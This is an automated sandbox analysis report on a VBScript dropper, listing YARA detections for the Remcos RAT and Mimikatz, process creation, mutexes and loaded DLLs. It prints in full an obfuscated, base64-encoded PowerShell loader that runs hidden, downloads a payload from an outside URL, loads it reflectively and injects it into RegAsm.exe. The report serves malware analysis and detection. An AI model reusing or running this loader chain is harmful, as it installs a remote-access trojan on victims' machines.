                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@8/6@1/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sedqkmkm.5pl.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 5fKvwnCAeC.vbsVirustotal: Detection: 9%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 0000000A.00000002.1404922826.0000026F3E840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJyk", "0", "false");
                  Found suspicious powershell code related to unpacking or dynamic code loading
